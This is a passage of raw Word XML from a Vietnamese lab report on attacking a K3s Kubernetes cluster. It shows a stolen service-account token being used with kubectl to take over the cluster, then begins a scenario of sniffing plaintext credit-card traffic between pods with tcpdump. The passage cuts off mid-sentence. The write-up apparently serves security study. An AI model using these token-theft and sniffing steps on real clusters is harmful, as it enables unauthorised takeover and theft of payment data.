    </w:tbl>
    <w:p w14:paraId="0A2D740A" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:hanging="142"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E9F12C8" wp14:editId="67A07A64">
            <wp:extent cx="5830668" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130036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6594" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5837164" cy="610279"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC95FF4" w14:textId="3D77D3FF" w:rsidR="00671F8E" w:rsidRPr="008A233C" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:bookmarkStart w:id="50" w:name="_Toc233498151"/>
      <w:r>
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="008A233C">
        <w:t>. Token bị hacker lấy được trong quá trình khai thác</w:t>
      </w:r>
      <w:bookmarkEnd w:id="50"/>
    </w:p>
    <w:p w14:paraId="2472CF96" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="008A233C" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="008A233C">
        <w:t>Kẻ tấn công sao chép (Copy) toàn bộ chuỗi token siêu dài mã hóa dạng JWT (bắt đầu bằng eyJ...) hiển thị trên màn hình.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63926CF4" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="009823E1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00690E86">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cấu hình Kubectl từ xa trên máy Kali:</w:t>
      </w:r>
      <w:r w:rsidRPr="00690E86">
        <w:t xml:space="preserve"> Mở một Terminal độc lập trên máy Kali Linux, kẻ tấn công nạp Token trộm được và IP thật của API Server (Master Node) vào biến môi trường:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036AC714" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00A55D11" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00A55D11">
        <w:t>Chiếm quyền điều khiển thực tế: Kẻ tấn công ra lệnh cho cụm K3s thông qua công cụ kubectl.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00671F8E" w14:paraId="3FE500E3" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="3263F61A" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00690E86" w:rsidRDefault="00671F8E" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>kubectl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> --server=$MASTER_URL --token=$TOKEN --insecure-skip-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tls</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00690E86">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>-verify get nodes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F5FDC35" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="51" w:name="_Toc233498112"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Kết quả thực nghiệm đạt được</w:t>
      </w:r>
      <w:bookmarkEnd w:id="51"/>
    </w:p>
    <w:p w14:paraId="2B8FABA1" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00E706D1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="009823E1">
        <w:t>Màn hình máy Kali Linux in ra danh sách toàn bộ các node master01 và worker01 ở trạng thái Ready. Với quyền cluster-admin có được, tin tặc đã chiếm quyền kiểm soát tối cao toàn bộ Cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="00E706D1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B8192D" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc233498113"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Kịch bản TN-03: Tấn công liên quan đến lớp mạng mạng nội bộ (Container Networking)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="4EAABD72" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc233498114"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Mục tiêu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="0732A00D" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r>
        <w:t>Khai thác kiến trúc mạng phẳng mặc định (không có tường lửa cô lập Pod) để tiến hành bắt và phân tích gói tin (Sniffing), đánh cắp thông tin thẻ tín dụng nhạy cảm truyền tải dưới dạng văn bản thô (Plaintext) giữa các dịch vụ vi mô lân cận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C32B9D6" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc233498115"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Cấu trúc dịch vụ giả lập phục vụ Lab</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="0110198B" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00E706D1" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hệ thống bổ sung một microservice ngầm mang tên </w:t>
      </w:r>
      <w:r w:rsidRPr="0043452B">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>payment-service</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B091F5" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00FB4013" w:rsidRDefault="00671F8E" w:rsidP="00FB4013">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc233498116"/>
      <w:r w:rsidRPr="00FB4013">
        <w:t>Quy trình thực hiện chi tiết</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="4DDC4124" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00DD1DE0" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cài đặt công cụ bắt gói tin</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1DE0">
        <w:t>: Tại phiên shell tương tác của Pod Frontend (nc), kẻ tấn công thực hiện cập nhật và cài đặt công cụ phân tích mạng:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00671F8E" w14:paraId="636392DE" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="15BBDEEB" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00DD1DE0" w:rsidRDefault="00671F8E" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DD1DE0">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>apt-get update &amp;&amp; apt-get install -y tcpdump</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E064302" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00010541" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kích hoạt cắm chốt bắt dữ liệu:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:t xml:space="preserve"> Kẻ tấn công ra lệnh cho tcpdump ghi lại toàn bộ lưu lượng di chuyển qua card mạng eth0 của Pod và xuất ra file định dạng pcap:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8780"/>
      </w:tblGrid>
      <w:tr w:rsidR="00671F8E" w14:paraId="78300D4F" w14:textId="77777777" w:rsidTr="001B2026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8780" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5145A74D" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRPr="00EC7C59" w:rsidRDefault="00671F8E" w:rsidP="001B2026">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EC7C59">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
              </w:rPr>
              <w:t>tcpdump -i eth0 -w /tmp/network_traffic.pcap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="667B95D2" w14:textId="77777777" w:rsidR="00671F8E" w:rsidRDefault="00671F8E" w:rsidP="00671F8E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Giả</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>người</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dùng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Từ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>máy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kali, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>trình</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>duyệt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>truy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cập</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>giao</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diện</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ứng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mục</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tiêu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>điền</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thông</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> tin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thẻ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tín</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ví</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: 4111-2222-3333-4444, CVV 123) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vào</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> form </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Cổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Thanh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toán</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Đơn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hàng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nội</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC7C59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
